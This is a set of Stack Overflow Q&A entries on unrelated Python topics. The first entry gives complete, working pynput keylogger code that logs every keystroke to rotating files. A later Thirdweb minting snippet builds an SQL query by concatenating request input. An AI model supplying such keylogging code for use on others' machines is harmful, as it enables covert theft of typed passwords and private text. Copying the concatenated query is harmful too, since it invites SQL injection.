The first one is about the start variable. Python use different namespaces for each program or function. Since start was defined at program level, it wasn't known in the function. Commenting out your timer logic was hiding the problem. You can fix the problem with the 'global' statement.
The second one is about "with open". If you use "with open" you must not close the file yourself. If you do, "with open" will not reopen the file.
Here's a working version of your program.
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time
start = time.time()
now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]
def on_press(key):
keys.append(key)
write_file(keys)
try:
print(key.char)
except AttributeError:
print(key)
def write_file(keys, f=None):
global start
for key in keys:
k=str(key).replace("'","").replace("Key.space", ' ').replace("Key.enter", '\n')
if not f:
f = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)
f.write( k)
end=time.time()
tot_time=end-start
if tot_time>5.0:
f.close()
f = None
start=end
else:
continue
keys = []
with Listener(on_press=on_press) as listener:
listener.join()
A nicer solution would be move the open/close logic outside the write_file() function.
A:
You may have to customize the first line.
schedule = [ '08:00:00', '12:00:00', '16:00:00', '20:00:00'] # schedule for close/open file (must ascend)
import pynput
from pynput.keyboard import Listener
def on_press(key):
txt = key.char if hasattr( key, 'char') else ( '<'+key._name_+'>')
# do some conversions and concatenate to line
if txt == '<space>': txt = ' '
if txt == None: txt = '<?key?>' # some keyboards may generate unknown codes for Multimedia
glo.line += txt
if (len(glo.line) > 50) or (txt=='<enter>'):
writeFile( glo.fh, glo.line+'\n')
glo.line = ''
def writeFile( fh, txt):
fh.write( txt)
def openFile():
from datetime import datetime
dt=datetime.now().strftime('%d%m%Y-%H%M%S')
fh = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)
return fh
def closeFile( fh):
fh.close()
def closeAndReOpen( fh, line):
if len( line) > 0:
writeFile( fh, line+'\n')
closeFile( fh)
fh = openFile()
return fh
class Ticker():
def __init__( self, sched=None, func=None, parm=None):
# 2 modes: if func is supplied, tick() will not return. Everything will be internal.
# if func is not supplied, it's non-blocking. The callback and sleep must be external.
self.target = None
self.sched = sched
self.func = func
self.parm = parm
def selectTarget( self):
for tim in self.sched: # select next target time (they are in ascending order)
if tim > self.actual:
self.target = tim
break
else: self.target = self.sched[0]
self.today = (self.actual < self.target) # True if target is today.
def tick( self):
from datetime import datetime
while True:
self.actual = datetime.now().strftime( "%H:%M:%S")
if not self.target: self.selectTarget()
if self.actual < self.target: self.today = True
act = (self.actual >= self.target) and self.today # True if target reached
if act: self.target = '' # next tick will select a new target
if not self.func: break # Non-blocking mode: upper level will sleep and call func
# The following statements are only executed in blocking mode
if act: self.func( self.parm)
time.sleep(1)
return act # will return only if func is not defined
class Glo:
pass
glo = Glo()
glo.fh = None
glo.line = ''
glo.fini = False
glo.fh = openFile()
listener = Listener( on_press=on_press)
listener.start()
ticker = Ticker( sched=schedule) # start ticker in non-blocking mode.
while not glo.fini:
import time
time.sleep(1)
if ticker.tick():
# time to close and reopen
glo.fh = closeAndReOpen( glo.fh, glo.line)
glo.line = ''
listener.stop()
writeFile( glo.fh, glo.line+'\n')
closeFile( glo.fh)
exit()
If you're satisfied, you may mark the answer as "ACCEPTed".
| How to automatically save text file after specific time in python? | This is my keylogger code:
import pynput
from pynput.keyboard import Key, Listener
from datetime import datetime, timedelta, time
import time
start = time.time()
now=datetime.now()
dt=now.strftime('%d%m%Y-%H%M%S')
keys=[]
def on_press(key):
keys.append(key)
write_file(keys)
try:
print(key.char)
except AttributeError:
print(key)
def write_file(keys):
with open ('log-'+str(dt)+'.txt','w') as f:
for key in keys:
# end=time.time()
# tot_time=end-start
k=str(key).replace("'","")
f.write(k.replace("Key.space", ' ').replace("Key.enter", '\n'))
# if tot_time>5.0:
# f.close()
# else:
# continue
with Listener(on_press=on_press) as listener:
listener.join()
In write_file() function, I've used the close method and also the timer which should automatically save the file after 5 seconds, but that gives me a long 1 paged error whose last line says:
ValueError: I/O operation on closed file.
How do I make my program save the txt file after every 5 seconds and create a new txt file automatically?
NOTE: I actually want the log file to be generated automatically after every 4 hours so that it is not flooded with uncountable words. I've just taken 5 seconds as an example.
| [
"The most important problem is that you did not reset the timer. After f.close(), end_time should be transferred into start_time.\nAlso, since you call write() for every event, there is no reason to accumulate into keys[].\nAlso, you never empty keys[].\n",
"I executed your program and found 2 problems.\nThe first one is about the start variable. Python use different namespaces for each program or function. Since start was defined at program level, it wasn't known in the function. Commenting out your timer logic was hiding the problem. You can fix the problem with the 'global' statement.\nThe second one is about \"with open\". If you use \"with open\" you must not close the file yourself. If you do, \"with open\" will not reopen the file.\nHere's a working version of your program.\nimport pynput\nfrom pynput.keyboard import Key, Listener\nfrom datetime import datetime, timedelta, time\nimport time\n\nstart = time.time()\n\nnow=datetime.now()\ndt=now.strftime('%d%m%Y-%H%M%S')\nkeys=[]\n\ndef on_press(key):\n keys.append(key)\n write_file(keys)\n try:\n print(key.char)\n except AttributeError:\n print(key)\n\ndef write_file(keys, f=None):\n global start\n for key in keys:\n k=str(key).replace(\"'\",\"\").replace(\"Key.space\", ' ').replace(\"Key.enter\", '\\n')\n\n if not f:\n f = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)\n f.write( k)\n\n end=time.time()\n tot_time=end-start\n if tot_time>5.0:\n f.close()\n f = None\n start=end\n else:\n continue\n keys = []\n\nwith Listener(on_press=on_press) as listener:\n listener.join()\n\nA nicer solution would be move the open/close logic outside the write_file() function.\n",
"You may have to customize the first line.\nschedule = [ '08:00:00', '12:00:00', '16:00:00', '20:00:00'] # schedule for close/open file (must ascend)\n\nimport pynput\nfrom pynput.keyboard import Listener\n\ndef on_press(key):\n txt = key.char if hasattr( key, 'char') else ( '<'+key._name_+'>')\n \n # do some conversions and concatenate to line\n if txt == '<space>': txt = ' '\n if txt == None: txt = '<?key?>' # some keyboards may generate unknown codes for Multimedia\n glo.line += txt\n\n if (len(glo.line) > 50) or (txt=='<enter>'):\n writeFile( glo.fh, glo.line+'\\n')\n glo.line = ''\n \ndef writeFile( fh, txt):\n fh.write( txt)\n\ndef openFile():\n from datetime import datetime\n dt=datetime.now().strftime('%d%m%Y-%H%M%S')\n fh = open( 'log-'+str(dt)+'.txt', 'w') # open (or reopen)\n return fh\n\ndef closeFile( fh):\n fh.close()\n\ndef closeAndReOpen( fh, line):\n if len( line) > 0:\n writeFile( fh, line+'\\n')\n closeFile( fh)\n fh = openFile()\n return fh\n \nclass Ticker():\n def __init__( self, sched=None, func=None, parm=None):\n # 2 modes: if func is supplied, tick() will not return. Everything will be internal.\n # if func is not supplied, it's non-blocking. The callback and sleep must be external.\n self.target = None\n self.sched = sched\n self.func = func\n self.parm = parm\n \n def selectTarget( self):\n for tim in self.sched: # select next target time (they are in ascending order)\n if tim > self.actual:\n self.target = tim\n break\n else: self.target = self.sched[0]\n self.today = (self.actual < self.target) # True if target is today.\n\n def tick( self):\n from datetime import datetime\n while True:\n self.actual = datetime.now().strftime( \"%H:%M:%S\")\n if not self.target: self.selectTarget()\n if self.actual < self.target: self.today = True\n act = (self.actual >= self.target) and self.today # True if target reached\n if act: self.target = '' # next tick will select a new target\n if not self.func: break # Non-blocking mode: upper level will sleep and call func\n # The following statements are only executed in blocking mode\n if act: self.func( self.parm)\n time.sleep(1)\n \n return act # will return only if func is not defined\n \nclass Glo:\n pass\n\nglo = Glo()\nglo.fh = None\nglo.line = ''\nglo.fini = False\n\nglo.fh = openFile()\nlistener = Listener( on_press=on_press)\nlistener.start()\nticker = Ticker( sched=schedule) # start ticker in non-blocking mode.\n\nwhile not glo.fini:\n import time\n time.sleep(1)\n if ticker.tick():\n # time to close and reopen\n glo.fh = closeAndReOpen( glo.fh, glo.line)\n glo.line = ''\n\nlistener.stop()\nwriteFile( glo.fh, glo.line+'\\n')\ncloseFile( glo.fh)\nexit()\n\nIf you're satisfied, you may mark the answer as \"ACCEPTed\".\n"
] | [
1,
0,
0
] | [] | [] | [
"keylogger",
"python"
] | stackoverflow_0074534026_keylogger_python.txt |
Q:
Dataset for a python application
I am working on an application to predict a disease from it's symptoms, I have some trouble making a dataset.
If someone has a dataset on this, please link it to drive and share it here.
Also I have a question on a good model for this(sklearn only). I am currently using decision tree classifier as my model for the project. Give suggestions if you have any.
Thank you for reading.
EDIT: Got the solution
A:
You can make your own from this csv template:
Sickness, Symptom1, Symptom2, Symptom4
Covid-19, Cough, Loss of taste, Fever, Chills
Common Cold, Sneezing, Cough, Runny Nose, Headache
ignore bullet points, just for formatting. then use pandas read csv to read the data. if u need more help @mention me
A:
I see that you are having trouble finding a dataset. I made a quick search, and i found this one in kaggle. It would require preprocessing, since many of the symptoms are nulls in the columns. Maybe you could make it so each column is a specific sympton, with values 1 (or 0) if the symptom is (or isn't) present. This would have the problem that the number of 0s would be very high. You can try that and see if it works.
You can also see another implementation with Random Forest in this link, with very different preprocessing. It is an advanced model of Decision Tree. However, the Decision Tree is more interpretable, if that is what you need.
| Dataset for a python application | I am working on an application to predict a disease from it's symptoms, I have some trouble making a dataset.
If someone has a dataset on this, please link it to drive and share it here.
Also I have a question on a good model for this(sklearn only). I am currently using decision tree classifier as my model for the project. Give suggestions if you have any.
Thank you for reading.
EDIT: Got the solution
| [
"You can make your own from this csv template:\n\nSickness, Symptom1, Symptom2, Symptom4\nCovid-19, Cough, Loss of taste, Fever, Chills\nCommon Cold, Sneezing, Cough, Runny Nose, Headache\n\nignore bullet points, just for formatting. then use pandas read csv to read the data. if u need more help @mention me\n",
"I see that you are having trouble finding a dataset. I made a quick search, and i found this one in kaggle. It would require preprocessing, since many of the symptoms are nulls in the columns. Maybe you could make it so each column is a specific sympton, with values 1 (or 0) if the symptom is (or isn't) present. This would have the problem that the number of 0s would be very high. You can try that and see if it works.\nYou can also see another implementation with Random Forest in this link, with very different preprocessing. It is an advanced model of Decision Tree. However, the Decision Tree is more interpretable, if that is what you need.\n"
] | [
0,
0
] | [] | [] | [
"data_science",
"dataset",
"machine_learning",
"python",
"scikit_learn"
] | stackoverflow_0074603450_data_science_dataset_machine_learning_python_scikit_learn.txt |
Q:
TKinter app - not showing frames in oop approach
Something must have gone wrong in my TKinter project when I restructured the code to conform to the OOP paradigm.
The MainFrame is no longer displayed. I would expect a red frame after running the code below, but it just shows a blank window.
import tkinter as tk
from tkinter import ttk
class App(tk.Tk):
def __init__(self):
super().__init__()
self.title("App")
self.geometry("800x600")
main_frame = MainFrame(self)
main_frame.tkraise()
class MainFrame(ttk.Frame):
def __init__(self, container):
super().__init__(container)
s = ttk.Style()
s.configure("top_frame.TFrame", background="red")
self.my_frame = ttk.Frame(self, style="top_frame.TFrame")
self.my_frame.pack(fill="both", expand=True)
if __name__ == "__main__":
app = App()
app.mainloop()
A:
You should also manage the geometry of your MainFrame inside the App, for example by packing it:
import tkinter as tk
from tkinter import ttk
class App(tk.Tk):
def __init__(self):
super().__init__()
self.title("App")
self.geometry("800x600")
main_frame = MainFrame(self)
main_frame.pack(fill='both', expand=True) # PACKING FRAME
main_frame.tkraise()
class MainFrame(ttk.Frame):
def __init__(self, container):
super().__init__(container)
s = ttk.Style()
s.configure("top_frame.TFrame", background="red")
self.my_frame = ttk.Frame(self, style="top_frame.TFrame")
self.my_frame.pack(fill="both", expand=True)
if __name__ == "__main__":
app = App()
app.mainloop()
| TKinter app - not showing frames in oop approach | Something must have gone wrong in my TKinter project when I restructured the code to conform to the OOP paradigm.
The MainFrame is no longer displayed. I would expect a red frame after running the code below, but it just shows a blank window.
import tkinter as tk
from tkinter import ttk
class App(tk.Tk):
def __init__(self):
super().__init__()
self.title("App")
self.geometry("800x600")
main_frame = MainFrame(self)
main_frame.tkraise()
class MainFrame(ttk.Frame):
def __init__(self, container):
super().__init__(container)
s = ttk.Style()
s.configure("top_frame.TFrame", background="red")
self.my_frame = ttk.Frame(self, style="top_frame.TFrame")
self.my_frame.pack(fill="both", expand=True)
if __name__ == "__main__":
app = App()
app.mainloop()
| [
"You should also manage the geometry of your MainFrame inside the App, for example by packing it:\nimport tkinter as tk\nfrom tkinter import ttk\n\nclass App(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"App\")\n self.geometry(\"800x600\")\n\n main_frame = MainFrame(self)\n main_frame.pack(fill='both', expand=True) # PACKING FRAME\n main_frame.tkraise()\n\n\nclass MainFrame(ttk.Frame):\n def __init__(self, container):\n super().__init__(container)\n s = ttk.Style()\n s.configure(\"top_frame.TFrame\", background=\"red\")\n self.my_frame = ttk.Frame(self, style=\"top_frame.TFrame\")\n self.my_frame.pack(fill=\"both\", expand=True)\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n\n"
] | [
1
] | [] | [] | [
"python",
"tkinter",
"user_interface"
] | stackoverflow_0074602995_python_tkinter_user_interface.txt |
Q:
How to convert CSV to parquet file without RLE_DICTIONARY encoding?
I've already test three ways of converting a csv file to a parquet file. You can find them below. All the three created the parquet file. I've tried to view the contents of the parquet file using "APACHE PARQUET VIEWER" on Windows and I always got the following error message:
"encoding RLE_DICTIONARY is not supported"
Is there any way to avoid this?
Maybe a way to use another type of encoding?...
Below the code:
1º Using pandas:
import pandas as pd
df = pd.read_csv("filename.csv")
df.to_parquet("filename.parquet")
2º Using pyarrow:
from pyarrow import csv, parquet
table = csv.read_csv("filename.csv")
parquet.write_table(table, "filename.parquet")
3º Using dask:
from dask.dataframe import read_csv
dask_df = read_csv("filename.csv", dtype={'column_xpto': 'float64'})
dask_df.to_parquet("filename.parquet")
A:
You should set use_dictionary to False:
import pandas as pd
df = pd.read_csv("filename.csv")
df.to_parquet("filename.parquet", use_dictionary=False)
| How to convert CSV to parquet file without RLE_DICTIONARY encoding? | I've already test three ways of converting a csv file to a parquet file. You can find them below. All the three created the parquet file. I've tried to view the contents of the parquet file using "APACHE PARQUET VIEWER" on Windows and I always got the following error message:
"encoding RLE_DICTIONARY is not supported"
Is there any way to avoid this?
Maybe a way to use another type of encoding?...
Below the code:
1º Using pandas:
import pandas as pd
df = pd.read_csv("filename.csv")
df.to_parquet("filename.parquet")
2º Using pyarrow:
from pyarrow import csv, parquet
table = csv.read_csv("filename.csv")
parquet.write_table(table, "filename.parquet")
3º Using dask:
from dask.dataframe import read_csv
dask_df = read_csv("filename.csv", dtype={'column_xpto': 'float64'})
dask_df.to_parquet("filename.parquet")
| [
"You should set use_dictionary to False:\nimport pandas as pd\ndf = pd.read_csv(\"filename.csv\")\ndf.to_parquet(\"filename.parquet\", use_dictionary=False)\n\n"
] | [
0
] | [] | [] | [
"csv",
"parquet",
"python"
] | stackoverflow_0073572870_csv_parquet_python.txt |
Q:
does the @property decorator function as a getter?
i am new to python and i'm trying to understand the use of the 'getter'. it's use case is not obvious to me.
if i use a property decorator on a method and im able to return a certain value, what exactly would i use 'getter' for.
class Person:
def __init__(self,name, age):
self._name = name
self._age = age
@property
def age(self):
return self._age
@age.setter
def age(self,new_age):
if isinstance(new_age,int) and 18 < new_age < 120:
self._age = new_age
A:
The @property decorator adds a default getter on a given field in a Python class
that triggers a function call upon accessing a property.
The @property decorator turns the age() method into a “getter” for a read-only attribute with the same name. If want a “setter” then add @age.setter as you did in your question.
p = Person("John", 22)
print(p.age)
Output:
22
A:
The property type can take up to 4 separate arguments (a getter, a setter, a deleter, and a doc string) when instantiating it. The first argument is a function that will be used as a getter. The second is a function that will be used as a setter. You could have written your class as
class Person:
def __init__(self,name, age):
self._name = name
self._age = age
def _age_getter(self):
return self._age
def _age_setter(self, new_age):
...
age = property(_age_getter, _age_setter)
This is cumbersome to write, so property objects have a number of methods for building the property up piece by piece. Using property as a simple decorator creates a read-only property with the decorated function as the getter.
# Equivalent to
# def age(self):
# return self._age
# age = property(age)
@property
def age(self):
return self._age
age.setter is a method of the property instance which creates a new property that is essentially a copy of age, but with its argument used to replace whatever setter the original property had. (Decorator syntax is why all the methods involved have to have the same name, so that we are constantly replacing the original property with the new, augmented property, rather than defining multiple similar properties with different names instead.)
@age.setter
def age(self, new_age):
...
Desugaring this requires the use of a temporary variable, to avoid losing the old value of age prematurely.
old_property = age
def age(self, new_age):
...
age = old_property.setter(age)
A silly, but legal, way of defining the property takes advantage of the fact that property can be defined with no arguments, and that there is a getter method that can be used as a decorator as well. (I don't think I've ever seen it used in the wild, though.)
class Person:
def __init__(self, name, age):
...
age = property()
@age.getter
def age(self):
...
@age.setter
def age(self, new_age):
...
Note that the order in which we use getter, setter, (and deleter) methods doesn't matter. The conventional order comes from the order in which property expects its positional arguments to be supplied, as well as the fact that new properties are virtually always defined by decorating the getter directly, rather than adding a getter to a property after it is created.
| does the @property decorator function as a getter? | i am new to python and i'm trying to understand the use of the 'getter'. it's use case is not obvious to me.
if i use a property decorator on a method and im able to return a certain value, what exactly would i use 'getter' for.
class Person:
def __init__(self,name, age):
self._name = name
self._age = age
@property
def age(self):
return self._age
@age.setter
def age(self,new_age):
if isinstance(new_age,int) and 18 < new_age < 120:
self._age = new_age
| [
"The @property decorator adds a default getter on a given field in a Python class\nthat triggers a function call upon accessing a property.\nThe @property decorator turns the age() method into a “getter” for a read-only attribute with the same name. If want a “setter” then add @age.setter as you did in your question.\np = Person(\"John\", 22)\nprint(p.age)\n\nOutput:\n22\n\n",
"The property type can take up to 4 separate arguments (a getter, a setter, a deleter, and a doc string) when instantiating it. The first argument is a function that will be used as a getter. The second is a function that will be used as a setter. You could have written your class as\nclass Person:\n def __init__(self,name, age):\n self._name = name\n self._age = age\n \n def _age_getter(self):\n return self._age\n\n def _age_setter(self, new_age):\n ...\n\n age = property(_age_getter, _age_setter)\n\nThis is cumbersome to write, so property objects have a number of methods for building the property up piece by piece. Using property as a simple decorator creates a read-only property with the decorated function as the getter.\n# Equivalent to\n# def age(self):\n# return self._age\n# age = property(age)\n@property\ndef age(self):\n return self._age\n\nage.setter is a method of the property instance which creates a new property that is essentially a copy of age, but with its argument used to replace whatever setter the original property had. (Decorator syntax is why all the methods involved have to have the same name, so that we are constantly replacing the original property with the new, augmented property, rather than defining multiple similar properties with different names instead.)\[email protected]\ndef age(self, new_age):\n ...\n\nDesugaring this requires the use of a temporary variable, to avoid losing the old value of age prematurely.\nold_property = age\ndef age(self, new_age):\n ...\nage = old_property.setter(age)\n\nA silly, but legal, way of defining the property takes advantage of the fact that property can be defined with no arguments, and that there is a getter method that can be used as a decorator as well. (I don't think I've ever seen it used in the wild, though.)\nclass Person:\n def __init__(self, name, age):\n ...\n\n age = property()\n\n @age.getter\n def age(self):\n ...\n\n @age.setter\n def age(self, new_age):\n ...\n\nNote that the order in which we use getter, setter, (and deleter) methods doesn't matter. The conventional order comes from the order in which property expects its positional arguments to be supplied, as well as the fact that new properties are virtually always defined by decorating the getter directly, rather than adding a getter to a property after it is created.\n"
] | [
2,
1
] | [] | [] | [
"getter",
"properties",
"python",
"python_decorators"
] | stackoverflow_0074603360_getter_properties_python_python_decorators.txt |
Q:
How can i fix the gas price issue in Thirdweb Python SDK Goerli TestNet
Im working with the Thirdweb Python SDK API. The code below sometimes work and sometimes throws a gasprice issue. I think it could be a network issue, because it works sometimes and generates the NFT but not always.
And when i got an error it is about gasprice. But in the Thirdweb API doesnt appear a gasprice argument or someting like this.
Any ideas?
Code:
sqlcol="SELECT ID,(SELECT contrato FROM colecciones WHERE ID=idcolec) AS contratonft FROM solicitudcert WHERE ID='" + idsolicitud + "' LIMIT 0, 1"
mycursor.execute(sqlcol)
misolicitud = mycursor.fetchone()
if(misolicitud):
contratonft_aux=str(misolicitud[1])
contratonft=contratonft_aux.replace('"','')
sdk = ThirdwebSDK.from_private_key(PRIVATE_KEY, NETWORK)
NFT_COLLECTION_ADDRESS = contratonft
nft_collection = sdk.get_nft_collection(NFT_COLLECTION_ADDRESS)
urlarchivoarr=imagencert.split("/")
urlarchivostr=str(urlarchivoarr[1]);
urlarchivoimg="https://files.avfenixrecords.com/" + urlarchivostr
# You can pass in any address here to mint the NFT to
tx = nft_collection.mint(NFTMetadataInput.from_json({
"name": nombrecert,
"description": descripcert,
"image": urlarchivoimg
}))
idnft=tx.id
return jsonify({'status':'OK','IDNFT':idnft})
else:
return jsonify({'status':'ERROR','IDNFT':"NULL"})
Error:
[2022-11-15 19:54:21,628] ERROR in app: Exception on /api/contracts/v1/mintnft [POST]
Traceback (most recent call last):
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 2525, in wsgi_app
response = self.full_dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1822, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask_cors/extension.py", line 165, in wrapped_function
return cors_after_request(app.make_response(f(*args, **kwargs)))
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1820, in full_dispatch_request
rv = self.dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1796, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
File "app.py", line 1851, in mintnft
tx = nft_collection.mint(NFTMetadataInput.from_json({
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 135, in mint
return self.mint_to(self._contract_wrapper.get_signer_address(), metadata)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 166, in mint_to
receipt = self._contract_wrapper.send_transaction("mint_to", [to, uri])
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/core/classes/contract_wrapper.py", line 113, in send_transaction
tx = getattr(self._contract_abi, fn).build_transaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/abi/token_erc721.py", line 1638, in build_transaction
return self._underlying_method(to, uri).buildTransaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1079, in buildTransaction
return build_transaction_for_function(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1648, in build_transaction_for_function
prepared_transaction = fill_transaction_defaults(web3, prepared_transaction)
File "cytoolz/functoolz.pyx", line 249, in cytoolz.functoolz.curry.__call__
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 114, in fill_transaction_defaults
default_val = default_getter(web3, transaction)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 60, in <lambda>
'gas': lambda web3, tx: web3.eth.estimate_gas(tx),
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/eth.py", line 825, in estimate_gas
return self._estimate_gas(transaction, block_identifier)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/module.py", line 57, in caller
result = w3.manager.request_blocking(method_str,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 198, in request_blocking
return self.formatted_response(response,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 171, in formatted_response
raise ValueError(response["error"])
ValueError: {'code': -32000, 'message': 'err: max fee per gas less than block base fee: address 0x98E0463643b28E24223d2B5EF19E78A9AF031505, maxFeePerGas: 70565183066 baseFee: 77047968359 (supplied gas 22141296)'}
I tried to modify the contracts config into the thirdweb dashboard without success.
A:
What network are you seeing this issue on? We can add in a method to manually overwrite gas limits in the SDK.
| How can i fix the gas price issue in Thirdweb Python SDK Goerli TestNet | Im working with the Thirdweb Python SDK API. The code below sometimes work and sometimes throws a gasprice issue. I think it could be a network issue, because it works sometimes and generates the NFT but not always.
And when i got an error it is about gasprice. But in the Thirdweb API doesnt appear a gasprice argument or someting like this.
Any ideas?
Code:
sqlcol="SELECT ID,(SELECT contrato FROM colecciones WHERE ID=idcolec) AS contratonft FROM solicitudcert WHERE ID='" + idsolicitud + "' LIMIT 0, 1"
mycursor.execute(sqlcol)
misolicitud = mycursor.fetchone()
if(misolicitud):
contratonft_aux=str(misolicitud[1])
contratonft=contratonft_aux.replace('"','')
sdk = ThirdwebSDK.from_private_key(PRIVATE_KEY, NETWORK)
NFT_COLLECTION_ADDRESS = contratonft
nft_collection = sdk.get_nft_collection(NFT_COLLECTION_ADDRESS)
urlarchivoarr=imagencert.split("/")
urlarchivostr=str(urlarchivoarr[1]);
urlarchivoimg="https://files.avfenixrecords.com/" + urlarchivostr
# You can pass in any address here to mint the NFT to
tx = nft_collection.mint(NFTMetadataInput.from_json({
"name": nombrecert,
"description": descripcert,
"image": urlarchivoimg
}))
idnft=tx.id
return jsonify({'status':'OK','IDNFT':idnft})
else:
return jsonify({'status':'ERROR','IDNFT':"NULL"})
Error:
[2022-11-15 19:54:21,628] ERROR in app: Exception on /api/contracts/v1/mintnft [POST]
Traceback (most recent call last):
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 2525, in wsgi_app
response = self.full_dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1822, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask_cors/extension.py", line 165, in wrapped_function
return cors_after_request(app.make_response(f(*args, **kwargs)))
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1820, in full_dispatch_request
rv = self.dispatch_request()
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/flask/app.py", line 1796, in dispatch_request
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)
File "app.py", line 1851, in mintnft
tx = nft_collection.mint(NFTMetadataInput.from_json({
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 135, in mint
return self.mint_to(self._contract_wrapper.get_signer_address(), metadata)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/contracts/nft_collection.py", line 166, in mint_to
receipt = self._contract_wrapper.send_transaction("mint_to", [to, uri])
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/core/classes/contract_wrapper.py", line 113, in send_transaction
tx = getattr(self._contract_abi, fn).build_transaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/thirdweb/abi/token_erc721.py", line 1638, in build_transaction
return self._underlying_method(to, uri).buildTransaction(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1079, in buildTransaction
return build_transaction_for_function(
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/contract.py", line 1648, in build_transaction_for_function
prepared_transaction = fill_transaction_defaults(web3, prepared_transaction)
File "cytoolz/functoolz.pyx", line 249, in cytoolz.functoolz.curry.__call__
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 114, in fill_transaction_defaults
default_val = default_getter(web3, transaction)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/_utils/transactions.py", line 60, in <lambda>
'gas': lambda web3, tx: web3.eth.estimate_gas(tx),
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/eth.py", line 825, in estimate_gas
return self._estimate_gas(transaction, block_identifier)
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/module.py", line 57, in caller
result = w3.manager.request_blocking(method_str,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 198, in request_blocking
return self.formatted_response(response,
File "/home/ombhkqgo/virtualenv/contratos/3.8/lib/python3.8/site-packages/web3/manager.py", line 171, in formatted_response
raise ValueError(response["error"])
ValueError: {'code': -32000, 'message': 'err: max fee per gas less than block base fee: address 0x98E0463643b28E24223d2B5EF19E78A9AF031505, maxFeePerGas: 70565183066 baseFee: 77047968359 (supplied gas 22141296)'}
I tried to modify the contracts config into the thirdweb dashboard without success.
| [
"What network are you seeing this issue on? We can add in a method to manually overwrite gas limits in the SDK.\n"
] | [
1
] | [] | [] | [
"price",
"python",
"sdk",
"thirdweb"
] | stackoverflow_0074447448_price_python_sdk_thirdweb.txt |
Q:
How to get UTC time in Python?
How do I get the UTC time, i.e. milliseconds since Unix epoch on Jan 1, 1970?
A:
For Python 2 code, use datetime.utcnow():
from datetime import datetime
datetime.utcnow()
For Python 3, use datetime.now(timezone.utc) (the 2.x solution will technically work, but has a giant warning in the 3.x docs):
from datetime import datetime, timezone
datetime.now(timezone.utc)
For your purposes when you need to calculate an amount of time spent between two dates all that you need is to subtract end and start dates. The results of such subtraction is a timedelta object.
From the python docs:
class datetime.timedelta([days[, seconds[, microseconds[, milliseconds[, minutes[, hours[, weeks]]]]]]])
And this means that by default you can get any of the fields mentioned in it's definition -
days, seconds, microseconds, milliseconds, minutes, hours, weeks. Also timedelta instance has total_seconds() method that:
Return the total number of seconds contained in the duration.
Equivalent to (td.microseconds + (td.seconds + td.days * 24 * 3600) *
106) / 106 computed with true division enabled.
A:
Timezone-aware datetime object, unlike datetime.utcnow():
from datetime import datetime,timezone
now_utc = datetime.now(timezone.utc)
Timestamp in milliseconds since Unix epoch:
datetime.now(timezone.utc).timestamp() * 1000
A:
In the form closest to your original:
import datetime
def UtcNow():
now = datetime.datetime.utcnow()
return now
If you need to know the number of seconds from 1970-01-01 rather than a native Python datetime, use this instead:
return (now - datetime.datetime(1970, 1, 1)).total_seconds()
